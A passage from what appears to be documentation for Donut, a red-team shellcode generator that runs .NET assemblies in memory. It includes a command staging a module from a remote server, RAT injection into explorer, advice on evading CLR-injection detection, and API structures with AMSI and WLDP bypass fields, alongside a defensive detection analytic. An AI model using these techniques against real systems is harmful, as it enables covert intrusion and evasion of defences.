148 .\donut.exe -u http://remote_server.com/modules/ -d ResourceDomain -r v2.0.50727 -f .\DemoCreateProcess\bin\Release\DemoCreateProcess.dll -c TestClass -m RunProcess -p notepad.exe,calc.exe
149 ```
150
151 ## Demonstrating with SILENTTRINITY
152
153 For a demonstration, we will use the [SILENTTRINITY RAT](https://github.com/byt3bl33d3r/SILENTTRINITY "SILENTTRINITY") as a test payload. Since it is the most... ahh... complicated .NET Assembly that I could find, I used it for all of my testing. You may use any standard shellcode injection technique to inject the .NET Assembly. The DonutTest subproject is provided in the repo as an example injector. You may combine it with the DemoCreateProcess subproject to test the shellcode generator. In our case, we will first use DonutTest to inject into explorer. We also show what it looks like to use an existing implant to perform further injection using the ``` boo/shellcode ``` and ``` ipy/execute-assembly ``` post-exploitation modules.
154
155 ### Generation
156
157 First, we will generate a x64 PIC using the SILENTTRINITY DLL. Using PowerShell, we will base64-encode the result and pipe it to our clipboard.
158
159 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy.png)
160
161 Because we don't know what processes will be available to inject into on-target, we will also generate a x86 PIC just in case we need it.
162
163 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_generate_and_copy_86.png)
164
165 If you wanted to, you could use a staging server by providing the URL and copying the Donut Module to the specified location.
166
167 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/generate_URL.png)
168
169 ### Choosing a Host Process
170
171 Use ProcessManager, a sub-project provided in the donut repo, to enumerate processes. ProcessManager enumerates all running processes and makes a best effort to obtain information about them. It is specifically designed to aid in determining what process to inject / migrate into. The picture below demonstrates its general usage.
172
173 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ProcessManager.jpg)
174
175 ### Injecting
176
177 First, we will use DonutTest to inject into explorer using DonutTest.
178
179 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_inject.jpg)
180
181 As you can see, the injection was successfull:
182
183 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_success.png)
184
185 Now assume we already have an agent running on the machine. We can use SILENTTRINITY's post-exploitation modules to inject implants into running processes.
186
187 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/ST_through_agent.png)
188
189
190 ## Using as a Library
191
192 donut is provided as both dynamic and static libraries for both (*.a* / *.so*) and Windows (*.lib* / *.dll*). It has a simple API that is described in *docs\api.html*. Two exported functions are provided, ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .
193
194 ## Rebuilding the shellcode
195
196 You may easily customize our shellcode to fit your use case. *payload.c* contains the .NET assembly loader, which should successfully compile with both Microsoft Visual Studio and mingw-w64. Make files have been provided for both compilers which will generate x86-64 shellcode by default unless x86 is supplied as a label to nmake/make. Whenever *payload.c* has been changed, recompiling for all architectures is recommended before rebuilding donut.
197
198 ### Microsoft Visual Studio
199
200 Open the x64 Microsoft Visual Studio build environment, switch to the *payload* directory, and type the following:
201
202 ```
203 nmake clean -f Makefile.msvc
204 nmake -f Makefile.msvc
205 ```
206
207 This should generate a 64-bit executable (*payload.exe*) from *payload.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *payload_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all payloads that it generates.
208
209 To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the payload directory, and type the following:
210
211 ```
212 nmake clean -f Makefile.msvc
213 nmake x86 -f Makefile.msvc
214 ```
215
216 This will save the shellcode as a C array to *payload_exe_x86.h*.
217
218 ### Mingw-w64
219
220 Assuming you're on Linux and *mingw-w64* has been installed from packages or source, you may still rebuild the shellcode using our provided makefile. Change to the *payload* directory and type the following:
221
222 ```
223 make clean -f Makefile.mingw
224 make -f Makefile.mingw
225 ```
226
227 Once you've recompiled for all architectures, you may rebuild donut.
228
229 ## Integrating into Tooling
230
231 We hope that donut (or something inspired by it) will be integrated into tooling to provide **inject** and **migrate** functionality. To do so, we suggest one of the following methods:
232
233 * As an operator, using the generator to manually generate shellcode.
234 * Generate the shellcode dynamically on your C2 server, pass that down to an existing implant, and inject it into another process.
235 * Use our dynamic or static libraries.
236 * As a template for building your own shellcode / generator.
237 * Use our Python (Python planned for v1.0) extension to script shellcode generation dynamically.
238
239 # Advancing Tradecraft
240
241 It is our hope that releasing donut to the public will advance offensive and red team tradecraft in several ways:
242
243 * Provide red teams and adversary emulators with a means to emulate this technique that threat actors may have developed in secret.
244 * Provide blue teams a frame of refernce for detecting and mitigating CLR Injection techniques.
245 * Inspire tool developers to develop new types of techniques and tradecraft.
246
247 ## Alternative Payloads
248
249 The main benefit of using .NET Assemblies as shellcode is that they can now be executed by anything that can execute shellcode on Windows. There are many more ways to inject shellcode than there are to load Assemblies. As such, offensive tool designers no longer need to design their payloads around running .NET. Instead, they may leverage their existing payloads and techniques that use shellcode.
250
251 ## Injecting .NET At Will / Migration
252
253 Donut will also allow the developers of C2 Frameworks / RATs to add migrate-like functionality to their tools. By using Donut as a library (or calling the generator) on the server and then providing the result to an existing agent, it may inject a new instance of itself into another running process. This may also be used to inject arbitrary post-exploitation modules so long as I/O is properly redirected.
254
255 ## Disposable AppDomains
256
257 When donut loads an Assembly, it loads it into a new AppDomain. Unless the user specifies the name of the AppDomain with the '-d' parameter, the AppDomain is given a random name. We specifically designed donut to run payloads in new AppDomains rather than using DefaultDomain. If this does not suit you, you can easily modify payload.c to use the default domain. By running the payload in its own AppDomain, this allows for the development of tools that run post-exploitation modules in disposable AppDomains. Application Domains can be unloaded, but individual Assemblies cannot. Therefore, to unload an Assembly when you are done with it, you must put it into its own AppDomain and unload that instead. A C# agent can have the shellcode generated on its server, inject the result into itself in a new thread, wait for the Assembly to finish executing, then unload the host AppDomain. You could also modify the shellcode itself to perform that role.
258
259 ## Detecting CLR Injection
260
261 One of the companion projects for donut is ModuleMonitor. It uses WMI Event Win32_ModuleLoadTrace to monitor for module loading. It provides filters, detailed data, and has an option to monitor for CLR Injection attacks.
262
263 The CLR Sentry option follows some simple logic: If a process loads the CLR, but the program is not a .NET program, then the CLR has been injected into it.
264
265 While useful, there are both false positives and false negatives:
266
267 * False Postiive: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will notice every unmanaged program that loads the CLR.
268 * False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So, no use of the Reflection API and not when donut is used to inject shellcode into managed processes.
269
270 Please Note: This is intended **only** as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment.
271
272 I am not a defender, but the following pseudocode is my attempt at an analytic that follows this logic. The DLLs that are associated with the CLR all start with "msco", such as "mscorlib.dll" and "mscoree.dll". As such, we watch for their loading, then check if the program that loaded them is a valid .NET Assembly.
273
274 ```
275 void CLR_Injection:
276 WHEN Image_Load event:
277 if event.Module.Name contains "msco*.dll":
278 if !(IsValidAssembly(event.Process.FilePath)):
279 {
280 print "A CLR has been injected into " + event.Process.Id
281 }
282 ```
283
284 The snippet below represents my implementation of this logic in C#. The full code can be found in ModuleMonitor.
285
286 ```csharp
287 //CLR Sentry
288 //Author: TheWover
289 while (true)
290 {
291 //Get the module load.
292 Win32_ModuleLoadTrace trace = GetNextModuleLoad();
293
294 //Split the file path into parts delimited by a '\'
295 string[] parts = trace.FileName.Split('\\');
296
297 //Check whether it is a .NET Runtime DLL
298 if (parts[parts.Length - 1].Contains("msco"))
299 {
300 //Get a
301 Process proc = Process.GetProcessById((int) trace.ProcessID);
302
303 //Check if the file is a .NET Assembly
304 if (!IsValidAssembly(proc.StartInfo.FileName))
305 {
306 //If it is not, then the CLR has been injected.
307 Console.WriteLine();
308
309 Console.WriteLine("[!] CLR Injection has been detected!");
310
311 //Display information from the event
312 Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID);
313 }
314 }
315 }
316 ```
317
318 ![_config.yml]({{ site.baseurl }}/images/Introducing_Donut/detected.png)
319
320 It is important to note that this behaviour represents all CLR Injection techniques, of which there are several. This detection should work for donut, as well as other tools such as Cobalt Strike's 'execute-assembly' command.
321
322 ## OpSec Considerations
323
324 ModuleMonitor demonstrates an important point about CLR Injection: When performed against unmanaged processes, CLR Injection produces highly anomalous process behavior. The loading of a CLR after a process's initial execution or from unmanaged code is unusual. There are few legitimate use cases. From a defender's perspective, this allows you to build a analytics that monitor for the behavior described in the section above.
325
326 However, as I mentioned, this analytic fails to detect CLR Injection into processes that already have the CLR loaded. As such, an operator could evade the analytic by simply injecting into processes that are already managed. I would recommend the following standard operating procedure:
327
328 1. Run ProcessManager from memory to enumerate processes. Take note of which you can inject into.
329 2. If there are any processes that are already managed, then consider them the set of potential targets.
330 3. If there are not any managed processes, then all processes are potential targets.
331 4. Either way, inject / migrate into the process that is most likely to naturally produce network traffic and live the longest.
332
333 # Conclusion
334
335 Offensive .NET tradecraft is faced with several important challenges. One of them is the lack of means to inject into remote processes at will. While this can normally be performed with shellcode, there is no way to produce shellcode that can run a .NET Assembly directly on hardware. Any shellcode that runs a .NET Assembly must first bootstrap the Common Language Runtime and load the Assembly through it. Enter Donut. With Donut, we now have a framework for generating flexible shellcode that loads a .NET Assembly from memory. This can be combined with existing techniques and tooling to advance tradecraft in a number of ways. Hopefully, this will break down the current barriers in .NET-based exploitation and provide tool designers with a foundation for crafting more excellent tools.
0
1 <html>
2 <body>
3
4 <h3>API</h3>
5
6 <ul>
7 <li><code>int DonutCreate(PDONUT_CONFIG pConfig)</code></li>
8 <li><code>int DonutDelete(PDONUT_CONFIG pConfig)</code></li>
9 </ul>
10
11 <p>When provided with a valid configuration, <code>DonutCreate</code> will generate a shellcode to execute a VBS/JS/EXE/DLL or XSL files in-memory. If the function returns <code>DONUT_ERROR_SUCCESS</code>, the configuration will contain three components:</p>
12
13 <ol>
14 <li>An encrypted <var>Instance</var></li>
15 <li>An encrypted <var>Module</var></li>
16 <li>A position-independent code (PIC) or shellcode with <var>Instance</var> embedded in it.</li>
17 </ol>
18
19 <p>The key to decrypt the <var>Module</var> is stored in the <var>Instance</var> so that if a module is discovered on a staging server by an adversary, it should not be possible to decrypt the contents without the instance. <code>DonutDelete</code> will release any memory allocated by a successful call to <code>DonutCreate</code>. The <var>Instance</var> will already be attached to the PIC ready for executing in-memory, but the module may require saving to disk if the PIC will retrieve it from a remote staging server.</p>
20
21 <h3>Configuration</h3>
22
23 <p>A configuration requires a target architecture (only x86 and x86-64 are currently supported), a path to a VBS/JS/EXE/DLL or XML file that will be executed in-memory by the shellcode, a namespace/class for a .NET assembly, including the name of a method to invoke and any parameters passed to the method. If the module will be stored on a staging server, a URL is required, but not a module name because that will be generated randomly.</p>
24
25 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CONFIG <span style='color:#800080; '>{</span>
26 <span style='color:#800000; font-weight:bold; '>int</span> arch<span style='color:#800080; '>;</span> <span style='color:#696969; '>// target architecture for shellcode </span>
27 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of domain to create for assembly</span>
28 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace</span>
29 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to execute</span>
30 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span><span style='color:#808030; '>(</span>DONUT_MAX_PARAM<span style='color:#808030; '>+</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#808030; '>*</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters passed to method, separated by comma or semi-colon</span>
31 <span style='color:#800000; font-weight:bold; '>char</span> file<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// assembly to create module from </span>
32 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to root path of where module will be on remote http server</span>
33 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version to use.</span>
34 <span style='color:#800000; font-weight:bold; '>char</span> modname<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of module written to disk</span>
35
36 <span style='color:#800000; font-weight:bold; '>int</span> mod_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// .NET EXE/DLL, VBS,JS,EXE,DLL,XSL</span>
37 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_MODULE</span>
38 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>mod<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut module</span>
39
40 <span style='color:#800000; font-weight:bold; '>int</span> inst_type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL</span>
41 uint64_t inst_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of DONUT_INSTANCE</span>
42 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>inst<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to donut instance</span>
43
44 uint64_t pic_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// size of shellcode</span>
45 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>pic<span style='color:#800080; '>;</span> <span style='color:#696969; '>// points to PIC/shellcode</span>
46 <span style='color:#800080; '>}</span> DONUT_CONFIG<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CONFIG<span style='color:#800080; '>;</span>
47 </pre>
48
49 <table border="1">
50 <tr>
51 <th>Member</th>
52 <th>Description</th>
53 </tr>
54 <tr>
55 <td><code>arch</code></td>
56 <td>Indicates the type of assembly code to generate. <code>DONUT_ARCH_X86</code> and <code>DONUT_ARCH_X64</code> are self-explanatory. <code>DONUT_ARCH_X84</code> indicates dual-mode that combines shellcode for both x86 and amd64. ARM64 will be supported at some point.</td>
57 </tr>
58 <tr>
59 <td><code>domain</code></td>
60 <td>AppDomain name to create. If one is not specified by the caller, it will be generated randomly.</td>
61 </tr>
62 <tr>
63 <td><code>cls</code></td>
64 <td>The class name with method to invoke. A namespace is optional. e.g: <var>namespace.class</var></td>
65 </tr>
66 <tr>
67 <td><code>method</code></td>
68 <td>The method that will be invoked by the shellcode once a .NET assembly is loaded into memory. This also holds the name of an exported API if the module is an unmanaged DLL.</td>
69 </tr>
70 <tr>
71 <td><code>param</code></td>
72 <td>Contains a list of parameters for the .NET method or DLL function. Each separated by semi-colon or comma.</td>
73 </tr>
74 <tr>
75 <td><code>file</code></td>
76 <td>The path of a supported file type: VBS/JS/EXE/DLL or XSL.</td>
77 </tr>
78 <tr>
79 <td><code>url</code></td>
80 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should contain the server and path of where module will be stored. e.g: https://www.rogueserver.com/modules/</td>
81 </tr>
82 <tr>
83 <td><code>runtime</code></td>
84 <td>The CLR runtime version to use for the .NET assembly. If none is provided, donut will try read from meta header. If that fails, v4.0.30319 is used by default.</td>
85 </tr>
86 <tr>
87 <td><code>modname</code></td>
88 <td>If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this will contain a randomly generated name for the module that should be used when saving the contents of <code>mod</code> to disk.</td>
89 </tr>
90 <tr>
91 <td><code>mod_type</code></td>
92 <td>Indicates the type of file detected by <code>DonutCreate</code>. For example, <code>DONUT_MODULE_VBS</code> indicates a VBScript file.</td>
93 </tr>
94 <tr>
95 <td><code>mod_len</code></td>
96 <td>The total size of the <var>Module</var> pointed to by <code>mod</code>.</td>
97 </tr>
98 <tr>
99 <td><code>mod</code></td>
100 <td>Points to encrypted <var>Module</var>. If the <code>type</code> is <code>DONUT_INSTANCE_URL</code>, this should be saved to file using the <code>modname</code> and accessible via HTTP server.</td>
101 </tr>
102 <tr>
103 <td><code>inst_type</code></td>
104 <td><code>DONUT_INSTANCE_PIC</code> indicates a self-contained payload which means the .NET assembly is embedded in executable code. <code>DONUT_INSTANCE_URL</code> indicates the .NET assembly is stored on a remote server with a URL embedded in the instance.</td>
105 </tr>
106 <tr>
107 <td><code>inst_len</code></td>
108 <td>The total size of the <var>Instance</var> pointed to by <code>inst</code>.</td>
109 </tr>
110 <tr>
111 <td><code>inst</code></td>
112 <td>Points to an encrypted <var>Instance</var> after a successful call to <code>DonutCreate</code>. Since it's already attached to the <code>pic</code>, this is only provided for debugging purposes.</td>
113 </tr>
114 <tr>
115 <td><code>pic_len</code></td>
116 <td>The size of data pointed to by <code>pic</code>.</td>
117 </tr>
118 <tr>
119 <td><code>pic</code></td>
120 <td>Points to executable code for the target architecture which also contains an instance. This should be injected into a remote process.</td>
121 </tr>
122 </table>
123
124 <p>Everything that follows here concerns internal workings of Donut and is not required to generate a payload.</p>
125
126 <h3>Instance</h3>
127
128 <p>The position-independent code will always contain an <var>Instance</var> which can be viewed simply as a configuration for the code itself. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, it will decrypt the instance before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>.</p>
129
130 <pre style='color:#000000;background:#ffffff;'><span style='color:#696969; '>// everything required for an instance goes into the following structure</span>
131 <span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_INSTANCE <span style='color:#800080; '>{</span>
132 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of instance</span>
133 DONUT_CRYPT key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// decrypts instance</span>
134
135 uint64_t iv<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit initial value for maru hash</span>
136
137 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
138 uint64_t hash<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api hashes</span>
139 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>addr<span style='color:#808030; '>[</span><span style='color:#008c00; '>64</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// holds up to 64 api addresses</span>
140 <span style='color:#696969; '>// include prototypes only if header included from payload.h</span>
141 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>ifdef</span><span style='color:#004a43; '> PAYLOAD_H</span>
142 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
143 <span style='color:#696969; '>// imports from kernel32.dll or kernelbase.dll</span>
144 LoadLibraryA_t LoadLibraryA<span style='color:#800080; '>;</span>
145 GetProcAddress_t <span style='color:#400000; '>GetProcAddress</span><span style='color:#800080; '>;</span>
146 GetModuleHandleA_t GetModuleHandleA<span style='color:#800080; '>;</span>
147 VirtualAlloc_t <span style='color:#400000; '>VirtualAlloc</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// required to allocate RW memory for instance </span>
148 VirtualFree_t <span style='color:#400000; '>VirtualFree</span><span style='color:#800080; '>;</span>
149 VirtualQuery_t <span style='color:#400000; '>VirtualQuery</span><span style='color:#800080; '>;</span>
150 VirtualProtect_t <span style='color:#400000; '>VirtualProtect</span><span style='color:#800080; '>;</span>
151 Sleep_t <span style='color:#400000; '>Sleep</span><span style='color:#800080; '>;</span>
152 MultiByteToWideChar_t <span style='color:#400000; '>MultiByteToWideChar</span><span style='color:#800080; '>;</span>
153 GetUserDefaultLCID_t <span style='color:#400000; '>GetUserDefaultLCID</span><span style='color:#800080; '>;</span>
154
155 <span style='color:#696969; '>// imports from oleaut32.dll</span>
156 SafeArrayCreate_t SafeArrayCreate<span style='color:#800080; '>;</span>
157 SafeArrayCreateVector_t SafeArrayCreateVector<span style='color:#800080; '>;</span>
158 SafeArrayPutElement_t SafeArrayPutElement<span style='color:#800080; '>;</span>
159 SafeArrayDestroy_t SafeArrayDestroy<span style='color:#800080; '>;</span>
160 SafeArrayGetLBound_t SafeArrayGetLBound<span style='color:#800080; '>;</span>
161 SafeArrayGetUBound_t SafeArrayGetUBound<span style='color:#800080; '>;</span>
162 SysAllocString_t SysAllocString<span style='color:#800080; '>;</span>
163 SysFreeString_t SysFreeString<span style='color:#800080; '>;</span>
164 LoadTypeLib_t LoadTypeLib<span style='color:#800080; '>;</span>
165
166 <span style='color:#696969; '>// imports from wininet.dll</span>
167 InternetCrackUrl_t InternetCrackUrl<span style='color:#800080; '>;</span>
168 InternetOpen_t InternetOpen<span style='color:#800080; '>;</span>
169 InternetConnect_t InternetConnect<span style='color:#800080; '>;</span>
170 InternetSetOption_t InternetSetOption<span style='color:#800080; '>;</span>
171 InternetReadFile_t InternetReadFile<span style='color:#800080; '>;</span>
172 InternetCloseHandle_t InternetCloseHandle<span style='color:#800080; '>;</span>
173 HttpOpenRequest_t HttpOpenRequest<span style='color:#800080; '>;</span>
174 HttpSendRequest_t HttpSendRequest<span style='color:#800080; '>;</span>
175 HttpQueryInfo_t HttpQueryInfo<span style='color:#800080; '>;</span>
176
177 <span style='color:#696969; '>// imports from mscoree.dll</span>
178 CorBindToRuntime_t CorBindToRuntime<span style='color:#800080; '>;</span>
179 CLRCreateInstance_t CLRCreateInstance<span style='color:#800080; '>;</span>
180
181 <span style='color:#696969; '>// imports from ole32.dll</span>
182 CoInitializeEx_t CoInitializeEx<span style='color:#800080; '>;</span>
183 CoCreateInstance_t CoCreateInstance<span style='color:#800080; '>;</span>
184 CoUninitialize_t CoUninitialize<span style='color:#800080; '>;</span>
185 <span style='color:#800080; '>}</span><span style='color:#800080; '>;</span>
186 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
187 <span style='color:#800080; '>}</span> api<span style='color:#800080; '>;</span>
188
189 <span style='color:#696969; '>// everything from here is encrypted</span>
190 <span style='color:#800000; font-weight:bold; '>int</span> api_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the 64-bit hashes of API required for instance to work</span>
191 <span style='color:#800000; font-weight:bold; '>int</span> dll_cnt<span style='color:#800080; '>;</span> <span style='color:#696969; '>// the number of DLL to load before resolving API</span>
192 <span style='color:#800000; font-weight:bold; '>char</span> dll_name<span style='color:#808030; '>[</span>DONUT_MAX_DLL<span style='color:#808030; '>]</span><span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// a list of DLL strings to load</span>
193
194 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
195 <span style='color:#800000; font-weight:bold; '>char</span> s<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// amsi.dll</span>
196 uint32_t w<span style='color:#808030; '>[</span><span style='color:#008c00; '>2</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span>
197 <span style='color:#800080; '>}</span> amsi<span style='color:#800080; '>;</span>
198
199 <span style='color:#800000; font-weight:bold; '>char</span> clr<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// clr.dll</span>
200 <span style='color:#800000; font-weight:bold; '>char</span> wldp<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wldp.dll</span>
201 <span style='color:#800000; font-weight:bold; '>char</span> wldpQuery<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpQueryDynamicCodeTrust</span>
202 <span style='color:#800000; font-weight:bold; '>char</span> wldpIsApproved<span style='color:#808030; '>[</span><span style='color:#008c00; '>32</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WldpIsClassInApprovedList</span>
203
204 <span style='color:#800000; font-weight:bold; '>char</span> amsiInit<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiInitialize</span>
205 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanBuf<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanBuffer</span>
206 <span style='color:#800000; font-weight:bold; '>char</span> amsiScanStr<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// AmsiScanString</span>
207
208 uint16_t wscript<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// WScript</span>
209 uint16_t wscript_exe<span style='color:#808030; '>[</span><span style='color:#008c00; '>16</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript.exe</span>
210
211 <span style='color:#603000; '>GUID</span> xIID_IUnknown<span style='color:#800080; '>;</span>
212 <span style='color:#603000; '>GUID</span> xIID_IDispatch<span style='color:#800080; '>;</span>
213
214 <span style='color:#696969; '>// GUID required to load .NET assemblies</span>
215 <span style='color:#603000; '>GUID</span> xCLSID_CLRMetaHost<span style='color:#800080; '>;</span>
216 <span style='color:#603000; '>GUID</span> xIID_ICLRMetaHost<span style='color:#800080; '>;</span>
217 <span style='color:#603000; '>GUID</span> xIID_ICLRRuntimeInfo<span style='color:#800080; '>;</span>
218 <span style='color:#603000; '>GUID</span> xCLSID_CorRuntimeHost<span style='color:#800080; '>;</span>
219 <span style='color:#603000; '>GUID</span> xIID_ICorRuntimeHost<span style='color:#800080; '>;</span>
220 <span style='color:#603000; '>GUID</span> xIID_AppDomain<span style='color:#800080; '>;</span>
221
222 <span style='color:#696969; '>// GUID required to run VBS and JS files</span>
223 <span style='color:#603000; '>GUID</span> xCLSID_ScriptLanguage<span style='color:#800080; '>;</span> <span style='color:#696969; '>// vbs or js</span>
224 <span style='color:#603000; '>GUID</span> xIID_IHost<span style='color:#800080; '>;</span> <span style='color:#696969; '>// wscript object</span>
225 <span style='color:#603000; '>GUID</span> xIID_IActiveScript<span style='color:#800080; '>;</span> <span style='color:#696969; '>// engine</span>
226 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptSite<span style='color:#800080; '>;</span> <span style='color:#696969; '>// implementation</span>
227 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse32<span style='color:#800080; '>;</span> <span style='color:#696969; '>// parser</span>
228 <span style='color:#603000; '>GUID</span> xIID_IActiveScriptParse64<span style='color:#800080; '>;</span>
229
230 <span style='color:#696969; '>// GUID required to run XSL files</span>
231 <span style='color:#603000; '>GUID</span> xCLSID_DOMDocument30<span style='color:#800080; '>;</span>
232 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMDocument<span style='color:#800080; '>;</span>
233 <span style='color:#603000; '>GUID</span> xIID_IXMLDOMNode<span style='color:#800080; '>;</span>
234
235 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// DONUT_INSTANCE_PIC or DONUT_INSTANCE_URL </span>
236
237 <span style='color:#800000; font-weight:bold; '>struct</span> <span style='color:#800080; '>{</span>
238 <span style='color:#800000; font-weight:bold; '>char</span> url<span style='color:#808030; '>[</span>DONUT_MAX_URL<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// staging server hosting donut module</span>
239 <span style='color:#800000; font-weight:bold; '>char</span> req<span style='color:#808030; '>[</span><span style='color:#008c00; '>8</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// just a buffer for "GET"</span>
240 <span style='color:#800080; '>}</span> http<span style='color:#800080; '>;</span>
241
242 uint8_t sig<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to hash</span>
243 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// to verify decryption ok</span>
244
245 DONUT_CRYPT mod_key<span style='color:#800080; '>;</span> <span style='color:#696969; '>// used to decrypt module</span>
246 uint64_t mod_len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// total size of module</span>
247
248 <span style='color:#800000; font-weight:bold; '>union</span> <span style='color:#800080; '>{</span>
